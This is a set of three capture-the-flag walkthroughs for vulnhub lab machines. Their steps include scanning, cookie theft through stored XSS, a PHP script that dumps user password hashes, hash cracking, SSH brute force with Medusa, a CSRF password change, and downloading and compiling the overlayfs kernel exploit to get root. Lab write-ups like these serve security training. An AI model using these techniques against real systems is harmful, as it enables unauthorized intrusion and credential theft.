Hack the LAMPSecurity (CTF Challenge)

Welcome to another boot2root CTF challenge “LAMPSecurity: CTF8” uploaded by Creosote on vulnhub. As, there is a theme, and you will need to snag the flag in order to complete the challenge and you can download it from: https://www.vulnhub.com/entry/lampsecurity-ctf8,87/

By author, it has a good variety of techniques needed to get root – no exploit development/buffer overflows. So, on the basis of our experience and knowledge, we have made progress in solving the lab.

Level: Beginner

Penetrating Methodologies:

§  Network scanning (Nmap)

§  Surfing HTTP web services

§  Web vulnerability analysis (Nikto)

§  Directory bruteforcing (Dirb)

§  Burpsuite to capture and modify request

§  Crack the password hashes (John - The Ripper)

§  SSH brute-force (Medusa)

§  Search and Capture the flag at various stages

Let’s start

First and foremost we’ll scan the IP address with nmap. In my case, the IP address was 192.168.1.112

nmap –A 192.168.1.112

As we can see that port 80 is open, we will scan it with nikto to check for web vulnerabilities

nikto  -h 192.168.1.112

Here from its result, we came to know that it is vulnerable to XSS and found phpinfo.php page is also available.  

Since port 80 was opened; so I explored target IP in the web browser and welcomed by following web page as shown below.

While checking its view-source page, here I found the first flag.

1^st flag: - #flag#550e1bafe077ff0b0b67f4e32f29d751

In our nikto result, we find out that phpinfo.php was available, check it as it contains various information about the php build and version on the target system, here we will find another flag

2^nd flag: #flag#550e1bafe077ff0b0b67f4e32f29d751

Next at the home page, we will read the articles posted on the home page, when you will read full article, you will find a new directory named “content” in the url.

As we haven’t seen this directory in the nikto result, we will brute-force this directory using dirb for more details about pages inside it.

dirb http://192.168.1.112/content

In the previous result, we found a page inside content directory named hidden, browse it and you’ll find another flag inside it.

3^rd flag:  #flag#57dbe55b42b307fb4115146d239955d0

Let us create a new user to access user page

Let us post a small script to print hello on page in the comment section of the article to check for cross-site scripting vulnerability

After posting the comment, browse the page to check if our script works and the alert proves that the cross-site scripting works

Now let’s edit our script to get the session id of anyone who visits the page. Basically we want to capture the session_id of Barbara who is the author of this article. To get the session id, we will force it to send a request to a url which consists of our ip-address and its cookie value, so that when anyone will visit this page, it will look for a page with the name at our server and will list out the whole url as an unreachable url. The script for that looks something like this

After saving it, we now will send link of this page to the author through the contact page in her profile

Right after sending this link, start python server in your kali, after some time you will see that some error messages are starting to pop-up in the log, from these messages, you will find out the session id of Barbara. To start the python server, the command goes like this:

Now go to home page and refresh the page to intercept its request in Burpsuite, and then replace the existing session id with the one captured in previous step and then forward it to log in as Barbara

After checking about the permissions of Barbara, we came to know that she can publish a page, so we will create a php page to extract data from table users and dump all the usernames and passwords. The code for the following will be something like this

$result = db query(‘ select name, pass from users’);

while($record = db_fetch_object($result))

{              print $record->name . “:” . $record-> pass . “
”;       }

?>

After saving when you’ll browse the page, you will find that it has dumped the usernames and passwords on the page, save these credentials in a file

Use John - The Ripper to decode the values of password hashes

john -w=/usr/share/wordlists/rockyou.txt -form=raw-md5 /root/Desktop/users.txt

After getting the usernames and passwords, we will try to brute-force ssh on the target device to check for the correct credentials, for this we will use medusa but none of the credentials will be successful.

medusa -h 192.168.1.112 -U /root/Desktop/user_list.txt -P /root/Desktop/pass.txt -M ssh

Let’s go back to basics, we know that each mail user has a display name which different from his actual username, but his username is always used in his mail id, so we will go to each users profile and copy its username from his mailing address and make a new users list.

For example: Steve Pinkton profile name is spinkon

Let’s try to brute force again, this time we will be successful as the three of the usernames will be having the password in our password list we made from the decrypted passwords

Now let’s login to target device using first credentials, here we found another flag along with the banner displayed, when you log in, you will find another flag, then list out all the files and directories, here you’ll find a file named flag, check its contents to discover one more flag.

4^rd flag: #flag#5e937c51b852e1ee90d42ddb5ccb8997

ls

cat flag.txt

5^th flag: #flag#0ab251c07822d26b07b88136739ae39b

Here we try to escalate privilege using sudo su command but it gives an error that jharraway is not in the sudoers list

Close the current connection and login to target device using second user: bdio’s credential, then list out all the files and directories, here you’ll find a file named flag, check its contents to discover one flag.

Here we try to escalate privilege using sudo su command but it gives an error that bdio is not in the sudoers list

Again close the connection and connect using third credentials, use ls command to list files, here also you’ll find a file named flag, check its content to get one more flag, let’s try to escalate privilege using sudo su command and BANG, you are now logged in as root. List all files using ls to discover another file named flag.txt but it holds same value as 5^th flag, check its content to discover another flag.

ssh spinkton@192.168.1.112

ls

cat flag.txt

sudo su

ls

cat flag .txt

6^th flag: #flag#fd38e201f27e98e13abcf62890c43303

Also you will also find one flag in /etc/passwd, to check it use

cat /etc/passwd

7^th flag: #flag#5b650c18929383074fea8870d857dd2e

Wow!! we finished this challenge by grabbing all hidden flags.

Hack the SecOS:1 (CTF Challenge)

Hello readers and welcome to another CTF challenge. It is developed by PaulWebSec. The aim of this lab is to get the root on the VM and read the congratulatory message. The virtual machine can be downloaded here. I quickly loaded up the machine and it was primed and ready!

Steps involved:

§  IP discovery and port scanning

§  Running the web app

§  Running a CSRF attack on administrator

§  Tricking admin to visit a fake page by sending him a message

§  Waiting a few minutes to let admin visit that page

§  Getting credentials and logging in SSH using these

§  Running overlayfs on the system

§  Getting root access!

So, let’s start.

I need not say this after so many articles but the first and foremost step is running netdiscover to find the IP address of the VM.

The IP address in my case was 192.168.1.128

I run an aggressive nmap scan on this IP address to find which ports were open and the first clue to start the attack on.

We found a web app working on port 8081. Without any delay we opened it.

We found a web app working on port 8081. Without any delay we opened it.

First hint was the message shown—“Secure Web App is a part of the vulnerable VM called secOS-2”

Hence, we inferred that this VM has web based vulnerabilities. Next step was to run a nikto scan which didn’t yield much info either.

So, we ran dirb in hope that we find something good here.

Of course there is a login page! And a login page in a web vulnerable app means a route to shell!

We moved forward to the login page directly.

Although, on inspecting the page, there were no satisfactory results but there was still a register user page available to us. We headed over there.

So we created a new user with the help of the register form. You can keep any name you want but sooner or later you’ll find, like we did, it isn’t of much use. More on that later.

Since, we got redirected to the home page, it was fair to assume we got registered. Let’s try and login into the web app using that user.

There wasn’t much of information on the page except for the fact we saw a “My Messages” tab on homepage.

Although, it is worthy to note that Burp Spider showed us a page called “hint” and upon inspecting that page we found the following details:

First: The admin visits the site very frequently.

Second: He runs it locally on 127.0.0.1

Third: CSRF is applicable!

After some going around, we found under “users” tab that Spiderman was administrator. Could it be possible that we prompt the admin to change its password to our custom pass?

Hence, we wrote a quick HTML CSRF in a text file and saved as csrf.html inside /var/www/html.

What this does is that it will prompt the administrator user to change its password to “passw0rd”

We saved the page to /var/www/html directory, started apache, ran the HTML code and waited for 2-3 minutes and we got logged into administrator account!

We found 2 messages from pirate user. One had a password for unidentified service. Could it be possible that this is a password for SSH?

We tried it out!

ssh spiderman@192.168.1.136

It worked!!

Next up, we looked for the Kernel version of the machine.

uname -a

After a couple of minutes of searching for exploits for the given kernel version we found something worth to our cause.

It is exploitable with an exploit called “overlayfs.”

We downloaded it and ran it.

cd /tmp

wget https://www.exploit-db.com/download/37292.c

gcc –o exploit 37292.c

After it got compiled using gcc, we ran it using:

./exploit

whoami

Voila! It gave us root shell.

cd /root

ls

cat flag.txt

And just like that, it was over. Hope you enjoyed.

Hack the De-ICE: S1.140 (Boot to Root)

Hello friends!! Today we are going to solve De-ICE: S1.140 CTF challenge presented by vulnhub for penetration practice. This lab is proposal for OSCP practice and mode of difficulty level is medium. You can download it from this Link: https://www.vulnhub.com/entry/de-ice-s1140,57/

Penetrating Methodlogies:

§  Network Scaning (Nmap)

§  HTTP Directory brute-force (Dirb)

§  Obtain Auth log

§  HTTPS Directory brute-force (Dirb)

§  Login in phpmyadmin

§  Steal database credential

§  FTP login to get tar file

§  SSH login to get backup.sh

§  Extracting tar file to get shadow file

§  Crack hashes (John the ripper)

§  Sudo privilege escaltion

§  Get secret.jpg

Let’s Begin!!

You will get target VM machine IP at the time of boot-up so let’s start with nmap port enumeration and execute following command in our terminal.

nmap -sV 192.168.1.110

Since port 80 was opened; so I explored target IP in the web browser and where we need to mark the lines to get the hint. Then at last you will following text shown as in the below image.

Even after reading above hint, I didn’t get any remarkable clue for further step therefore I use dirb for directory brute-force attack on HTTP.

dirb http://192.168.1.110

From its result I found so many web directories but /forum and its relative directories looks more interesting to me.

Then we navigate to /forum and observe following web page.

Further we explored /forum/index.php and notice the following web page which was an auth log for ssh login Looking at the log again, I noticed that there was only one successful login, which was from user mbrown. So I copied this log into a text file and named as file.txt

Then with help of following command we try to grep all invalid user entry who tried to login and opened session for ssh.

cat file.txt | grep “Invalid user” | awk ‘{print $8}’

cat file.txt | grep “open”

One of the user names we have grabbed in the file.txt was !DFiuoTkbxtdk0! appeared to be the password for mbrown .

I tried to login into the forum as mbrown with the password I found above, and get successfully logged in and found mbrown’s email address on his profile page as shown:

After that I run dirb on port 443 and notice some exclusive directories such /webmail and /phpmyadmin is also available.

When I explored https://192.168.1.110/webmail, I got sqirrelmail login page where I submit MBrown credential for login.

Name: mb@lazyadmin.corp

Password: !DFiuoTkbxtdk0!

In his mailbox I found mysql login information:

username: root

Password: S4!y.dk)j/_d1pKtX1

As we have enumerated that /phpmyadmin is also available so I explore it and submit above found mysql login information.

I successfully logged into database and with little more efforts I found all username and their encrypted password which I copied for decryption.

With help of online MD-5 decryption we got 2 hash values.

So now we have following credential

Rhedley: tum-ti-tum

Swillard: Austin-Willard

Now let’s try to connect with FTP with the following:

ftp 192.168.1.110

I was able to view the contents of the incoming directory which have a file backup_webhost_130111.tar.gz.enc that I downloaded with help of get command.

get backup_webhost_130111.tar.gz.enc

Then I explore more and found .ssh directory where I get ssh key “downloadkey” for user MBrown. I downloaded this also.

get downloadkey

Now let’s try to login into ssh with help of key enumerated above.

ssh -i downloadkey mbrown192.168.1.110

Bravo!! Successfully spawned victim’s machine, then I switch to user: rhedley where I found a script backup.sh which holds the command and password used to encrypt the backup_webhost_130111.tar.gz.enc I downloaded earlier.

su rhedley

cd /opt

ls

cat backup.sh

And found encryption is aes-256-cbc and password 8a1bae9881bfbfc68880d1e23d6a095e80db27b7c43e56ccc1

Now let’s try to decrypt backup_webhost_130111.tar.gz.enc with help of below command:

openssl aes-256-cbc -d -md md5 -in backup_webhost_130111.tar.gz.enc -out file.tar.gz -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs

tar -xvf file.tar.gz

Great!! It was a compress file of /etc directory and after extracting this tar file we have owned all valuable files of /etc directory of victim’s machine.

This gave me shadow file and I try to open it with help of cat command.

cd etc

cat shadow

And as you can see, I found hashes of three users, let’s try to crack it. Here I have saved all three entries into a text file and named it cracked.

Then used the following command to crack the hashes of shadow file but fail to crack the hashes for third user: sraines

unshadow passwd shadow > cracked

Then used darkcode.txt wordlist for password cracking and it took so much time to get the password for sraines who is renamed as swillard.

john cracked --wordlist=/root/darkcode.txt

So we got following credential:

User: sraines

Password: brillantissimo

So when I try to login with swillard: brillantissimo (password of sraines), it worked and I successfully login as swillard. Then I check sudo right and found this user has ALL privilege, which means he has root privilege.

su swillard

sudo -l

sudo su

cd /root

ls

Inside /root directory I found an image secret.jpg which I move into web directory.

mv secret.jpg /var/www/forum/templates_c/secret.jpg

So when I explored above path I got the image of a Birthday Cake!! J